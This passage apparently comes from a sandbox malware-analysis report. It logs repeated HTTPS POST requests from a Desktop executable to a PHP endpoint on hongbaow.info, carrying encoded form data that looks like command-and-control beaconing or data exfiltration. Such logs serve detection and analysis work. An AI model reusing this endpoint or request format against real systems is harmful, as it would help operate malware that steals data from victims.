                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:16 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oB1Gju10HbuKdy64GcO5OYmtj7DxoYfvgtezUdLsuGl1D0SOFmncQJy5c5dIJOXjpDst%2BIzESI01BteH%2B%2FxVi3c1f%2Fx34JdSH90siHOKT5TCf9eThe3C2wo1VkNSNnsv"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf3ddedac358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1498&rtt_var=570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1949265&cwnd=155&unsent_bytes=0&cid=850e58a9efe06c5a&ts=342&x=0"
                            2025-01-22 07:36:16 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.449903104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:17 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:17 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:18 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqDBdKGHnx9hWS8AHxjM77YF56EzFj04Kd%2BNKBYR%2Bl%2Bli3Xbv2wRO1Hb1s0dmCtqZpPVJEbOUfJbdQI6bnaZE57qKrgdLtO5Ty4YUh2mXNK3c3IE6%2BVHnFk8FTW32ueh"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf48cae37c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1755&rtt_var=688&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1557333&cwnd=218&unsent_bytes=0&cid=ab8c548ce05828e0&ts=341&x=0"
                            2025-01-22 07:36:18 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.449909104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:18 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:18 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:18 UTC812INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BHry%2BrEtRbCT5zE%2BLzgm9pfxZeATti%2FOmYAbk6X9I87ppUhaSVJvn46M7aA%2F9lIaPdRarhsXTZzk2rMU1hnI2oCWB9f85SzpjYZVhxovvE1rqoeZIYSze3GrCyYlfyA6"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf4c1fed8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1762&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1624026&cwnd=237&unsent_bytes=0&cid=e588637f52af0427&ts=325&x=0"
                            2025-01-22 07:36:18 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.449916104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:19 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:19 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:19 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:19 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXJwQ5ESoTswXxiB1QuG5XHMgS4NjfzsJ2Q%2F7n0wbmWxE3hXsxwSVMdGFgPeS7KXNOHWNrh1cxocBJ89cEvbZfrYsg117v%2FH3D1yhBWtUvYUPqDX6nwxGGdNMuUcp0qK"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf532f817c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1790&rtt_var=679&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1600877&cwnd=218&unsent_bytes=0&cid=2e66783d2ef2a905&ts=343&x=0"
                            2025-01-22 07:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.449926104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:21 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:21 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:21 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:21 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDf0ND7yo6b26j73Uv%2BbS2jtUW7LDlyfgGVQm2fnsL6IbaUqUz2YNJzi66hEmNPvQnRtKLGvE6ilsrLkxgpeDxMJcpyf7CWndoQb27%2BXQq3LdUEJjjhBlRoSHoil5AaP"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf5d4cdd8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1777&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1634023&cwnd=237&unsent_bytes=0&cid=46c2186f54919352&ts=322&x=0"
                            2025-01-22 07:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.449937104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:22 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:22 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:23 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J6IQ2fmbH5fRYpbIc35d7HHL%2Bq69fYefL9crepLhQcX0hv0zzx%2BAKAcMlwlbPGrFhcbMrrnTVchjFm6YJCrL7RCag8RnhhWmABTfSDaZ39c4qhJ2uY4Eq82NaFGKNrOH"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf66c82a7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1752&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1620421&cwnd=218&unsent_bytes=0&cid=dbfca448561ec2ee&ts=325&x=0"
                            2025-01-22 07:36:23 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.449948104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:24 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:24 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:24 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n15P6QophoPcRWGVHiSngkK0Es%2F8PtLd5Xapg1CT2%2BSJKZ306X9fECgdjmndvTTfVm0cLRxWwCyj2XyF2j%2Fv055b4Jy%2B0z83VrHu67PN%2BHROxgOxgyVT0vGeMfS4JCN8"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf6fbf2a4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1539&rtt_var=626&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1681059&cwnd=180&unsent_bytes=0&cid=ae3c9a1fbcd0d768&ts=356&x=0"
                            2025-01-22 07:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.449949104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:24 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:24 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:24 UTC810INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:24 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b3aTIlzkFbrvNC1zD%2BpH8ldqRciC2McKKG2rfrlg3AHScPquJNAu9OOXaq56dswUsV77q%2BSxOsCee5KmPIgUxI%2BsWOeFQHpxkDsoK%2FJVojSDZRxvuoCc1suBJUWBuBCa"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf709df942eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1571&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1858688&cwnd=215&unsent_bytes=0&cid=d70c102fd841bff5&ts=353&x=0"
                            2025-01-22 07:36:24 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.449958104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:25 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:25 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:25 UTC817INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:25 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZTmxZgD3C5N9XBToJKcXARGufZL8%2B%2Fk9yDCVsv0gY%2BS5y5pcFcQc9yOrjqw%2FSedyPhwZBsaA8KJLlpkZqABx0OZW4ZuvwnSo80orepVk%2BO1Y2EuTJQyLf3%2BZbd%2Fs%2BTR"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf785d078ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1753&rtt_var=673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1608815&cwnd=237&unsent_bytes=0&cid=8dbde69aac4aab6f&ts=335&x=0"
                            2025-01-22 07:36:25 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.449966104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:26 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:26 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:27 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:27 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9GT39Gb%2Fk6Qa257q1EBj9FQSEM3xxWzG3Gtik3AtU8Svh4jOmGkQlreOox%2BNOqogG6Xp0gVEsEu5iS1HFbk%2FI%2BnsDu8lEdpUy8ntJYbvFQ6aG5CrzVn4ixENJZTFDUO"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf80acb9c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=557&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1962365&cwnd=155&unsent_bytes=0&cid=d41fc6ae6e984c27&ts=338&x=0"
                            2025-01-22 07:36:27 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.449977104.21.64.1443
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:28 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:28 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:28 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8kMxfDnPrzxLQxAuiU%2FF%2FDvNO7TIaOVZt3U5QVznSH8Vpvd0k%2BpCpoe2JO4dUz0lmolx9oVh17Ba4i5eMeyXCYRM46QFgJYZookRxC9ctXKyBR3Pw4qlkxw9K2vDAQ1h"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf885efc7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1788&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1610590&cwnd=218&unsent_bytes=0&cid=c29d403b2056add4&ts=327&x=0"
                            2025-01-22 07:36:28 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.449983104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:29 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:29 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:29 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:29 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qwn1iSd1zU8lEr1DLJOj6Q0CKdBjr%2Fc3lc2HKxLRt3Utf6ipeAJtUEuhiIGVtp2tb89MBwDUBucNmY8oTmX9L4E%2F47yaN6625y0Q%2FEScCQ26SB3AXXyC8KXIW1UC0Nzc"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddf8fea717c6a-EWR
                            alt-svc: h3=":443"; ma=86400
